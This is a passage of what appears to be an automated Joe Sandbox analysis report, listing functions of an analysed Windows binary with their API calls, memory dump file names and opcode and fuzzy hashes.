                                                                                                                                                                        • Instruction Fuzzy Hash: D35175B24183859BCB25EF50D881EDFB3DCAF85350F000A2EF585C3191EF71A6988B66
                                                                                                                                                                        Function 002C9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 002C9534
                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 002C95A5
                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 002C9604
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002C9677
                                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002C96A2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4136290138-0
                                                                                                                                                                        • Opcode ID: 3186ec2bc5249b7417d67b743244e6099025b7e7937228720996fd85cf425062
                                                                                                                                                                        • Instruction ID: e478af884de57663f6fe87496f9868bd9b1a2290ebb48065ef0a099e188d6ca5
                                                                                                                                                                        • Opcode Fuzzy Hash: 3186ec2bc5249b7417d67b743244e6099025b7e7937228720996fd85cf425062
                                                                                                                                                                        • Instruction Fuzzy Hash: BE516BB5A10219DFCB10CF58D884EAAB7F9FF89314B158559E909DB350E730E961CF90
                                                                                                                                                                        Function 002D9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002D95F3
                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 002D961F
                                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002D9677
                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002D969C
                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002D96A4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2832842796-0
                                                                                                                                                                        • Opcode ID: 8442020917f536f0882d49657cc817bf482c07f7f94ecf664e4e60250bd46bd8
                                                                                                                                                                        • Instruction ID: 66a102b823d7d36f72d5054a267007b5e5380b6d0da19c58dfebe5a8edd689ed
                                                                                                                                                                        • Opcode Fuzzy Hash: 8442020917f536f0882d49657cc817bf482c07f7f94ecf664e4e60250bd46bd8
                                                                                                                                                                        • Instruction Fuzzy Hash: 03512975A102159FCB01EF64C885A6ABBF5FF48314F048059F949AB362CB35ED91CF90
                                                                                                                                                                        Function 002E9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 002E999D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 002E9A2D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 002E9A49
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 002E9A8F
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 002E9AAF
                                                                                                                                                                          • Part of subcall function 0027F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,002D1A02,?,753CE610), ref: 0027F9F1
                                                                                                                                                                          • Part of subcall function 0027F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,002C0354,00000000,00000000,?,?,002D1A02,?,753CE610,?,002C0354), ref: 0027FA18
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 666041331-0
                                                                                                                                                                        • Opcode ID: 5c4857478b676ced731ef987cc224cd577119f33779c71c588695230a3157730
                                                                                                                                                                        • Instruction ID: 9bc2876f5fab0746bd069f460c0c89c601f900ce55a94c7d9fa96b1071d85ed3
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c4857478b676ced731ef987cc224cd577119f33779c71c588695230a3157730
                                                                                                                                                                        • Instruction Fuzzy Hash: ED514735615246DFCB01EF69C0848ADBBB1FF09314B5480AAE80A9B322D731ED96CF91
                                                                                                                                                                        Function 002F75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 002F766B
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 002F7682
                                                                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002F76AB
                                                                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,002DB5BE,00000000,00000000), ref: 002F76D0
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 002F76FF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3688381893-0
                                                                                                                                                                        • Opcode ID: 473e89b885725ce7b252adc696b7728e07ddc7e6c3e40ca85d0c88d57f93a050
                                                                                                                                                                        • Instruction ID: cfa342a9188151aaf24fa12f4261e681ae0583f18eada30b8960e9e36135802c
                                                                                                                                                                        • Opcode Fuzzy Hash: 473e89b885725ce7b252adc696b7728e07ddc7e6c3e40ca85d0c88d57f93a050
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A41D335A28509AFC7259F2CDC48FB5FB69EB053A0F150234FA19EB2A0D770AD60DA50
                                                                                                                                                                        Function 002923C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                        • Opcode ID: 1c4a2743c8917c0a6f51bf83aa07444b98ca546b96a748931d28942d05fd0da7
                                                                                                                                                                        • Instruction ID: 307ddd00f60ce3f3848bd1ea108d159a71fa45403023109468a1025cc0135a1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c4a2743c8917c0a6f51bf83aa07444b98ca546b96a748931d28942d05fd0da7
                                                                                                                                                                        • Instruction Fuzzy Hash: D641BE36A10200EBCF20DF78C881A5DB7E5EF89714F1585A8E515EB291D631ED16CB80
                                                                                                                                                                        Function 002C224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002C2262
                                                                                                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 002C230E
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 002C2316
                                                                                                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 002C2327
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 002C232F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                                        • Opcode ID: a2aa8ae06853e6d78e30190c293e27745d27781f9d1e1ccacbee9f207bb9ebf1
                                                                                                                                                                        • Instruction ID: 2a56db36e1964055341777993a2bf1c2aec66949183ed548fb0068fba31cdc25
                                                                                                                                                                        • Opcode Fuzzy Hash: a2aa8ae06853e6d78e30190c293e27745d27781f9d1e1ccacbee9f207bb9ebf1
                                                                                                                                                                        • Instruction Fuzzy Hash: 4531AF71910219EFDB14CFA8DD89BAE3BB6EB04325F104229F925E72D0CB709954DB91
                                                                                                                                                                        Function 002DD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,002DCC63,00000000), ref: 002DD97D
                                                                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 002DD9B4
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,002DCC63,00000000), ref: 002DD9F9
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,002DCC63,00000000), ref: 002DDA0D
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,002DCC63,00000000), ref: 002DDA37
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3191363074-0
                                                                                                                                                                        • Opcode ID: 5b14b018f968de17ccd1df793a7faa8706740c23dd3f14a5a62c47b6c75f0111
                                                                                                                                                                        • Instruction ID: eeb18098aa51c35fead5c6ba235a790f770ea94023de9d57798950398cb3879f
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b14b018f968de17ccd1df793a7faa8706740c23dd3f14a5a62c47b6c75f0111
                                                                                                                                                                        • Instruction Fuzzy Hash: 28315E71524A05EFDB20DFA5D898AAFBBF8EB04360B10842EE546D2250D771EE54DB60
                                                                                                                                                                        Function 002F61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002F61E4
                                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 002F623C
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F624E
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F6259
                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F62B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 763830540-0
                                                                                                                                                                        • Opcode ID: e3af338d96fdf38a0dd2cfe0647278a459b516fc7bb1a488aeb12156abb8dffb
                                                                                                                                                                        • Instruction ID: 2fc4c45de02aa81315f98a2e82085c389ec7f0473e207beef04a76d3a68d8741
                                                                                                                                                                        • Opcode Fuzzy Hash: e3af338d96fdf38a0dd2cfe0647278a459b516fc7bb1a488aeb12156abb8dffb
                                                                                                                                                                        • Instruction Fuzzy Hash: FB219335D2021D9BDB11AFA0DC88AFEF7B9EB057A0F104266FB25EA180D7709995CF50
                                                                                                                                                                        Function 002E138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 002E13AE
                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 002E13C5
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 002E1401
                                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 002E140D
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 002E1445
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                                        • Opcode ID: 70daf37ee9f1751b79a42cfd35792ed49ec79fc358601e1693380734529d195d
                                                                                                                                                                        • Instruction ID: 2f32798db6e219769410b9d517ea93a8b2b9c8d97178cef90fca851068f1efff
                                                                                                                                                                        • Opcode Fuzzy Hash: 70daf37ee9f1751b79a42cfd35792ed49ec79fc358601e1693380734529d195d
                                                                                                                                                                        • Instruction Fuzzy Hash: 87219036610204AFDB04EF65D888AAEB7F9EF48350B148479F84AD7761CA30AC54DFA0
                                                                                                                                                                        Function 0029D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0029D146
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029D169
                                                                                                                                                                          • Part of subcall function 00293B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00286A79,?,0000015D,?,?,?,?,002885B0,000000FF,00000000,?,?), ref: 00293BC5
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029D18F
                                                                                                                                                                        • _free.LIBCMT ref: 0029D1A2
                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029D1B1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                        • Opcode ID: 16e7c46cbf6f4f1846be6e45c7d38457b59de41e1f22853d6a91227a25e4472e
                                                                                                                                                                        • Instruction ID: 17c914fdc25a2d98d682f2cb39e744bad645a33f1f8d1a25d61b6d2f0e54cb28
                                                                                                                                                                        • Opcode Fuzzy Hash: 16e7c46cbf6f4f1846be6e45c7d38457b59de41e1f22853d6a91227a25e4472e
                                                                                                                                                                        • Instruction Fuzzy Hash: 5901A7776216167F3B216A7AAC8CD7F7A6EDEC2BB13140129FD0CD6244DA608D11E5B0
                                                                                                                                                                        Function 002C08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?,?,002C0C4E), ref: 002C091B
                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0936
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0944
                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?), ref: 002C0954
                                                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0960
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                                        • Opcode ID: 82874b74cb7cbf662ac9963e8d38f50e60fa60fd9fcad8906a5a51276ee5b4cb
                                                                                                                                                                        • Instruction ID: 9430d649b9cf21c3048a910a6d1d89c89f6d56ea177c9ec450dbc66b717d4eb8
                                                                                                                                                                        • Opcode Fuzzy Hash: 82874b74cb7cbf662ac9963e8d38f50e60fa60fd9fcad8906a5a51276ee5b4cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 13018F72610205EFEB104F55EC88FAE7ABEEB44BE2F140228F905E2211D771DD51DBA0
                                                                                                                                                                        Function 002CF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002CF2AE
                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 002CF2BC
                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 002CF2C4
                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002CF2CE
                                                                                                                                                                        • Sleep.KERNEL32 ref: 002CF30A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                                                        • Opcode ID: 8d8144ba4d190e411d3b27fe117192df162a78da517685c098fb7c2279a5117d
                                                                                                                                                                        • Instruction ID: a398f1965cd607575d1e305fa74ef54221a44e0a5bb517d847ac5102610b7632
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d8144ba4d190e411d3b27fe117192df162a78da517685c098fb7c2279a5117d
                                                                                                                                                                        • Instruction Fuzzy Hash: 32016971C1165DEBDF00AFA4EE4DAEEBB7AFB08710F0005AAE901B2250DB309564C7A1
                                                                                                                                                                        Function 002C1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C1A60
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A6C
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A7B
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A82
                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C1A99
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
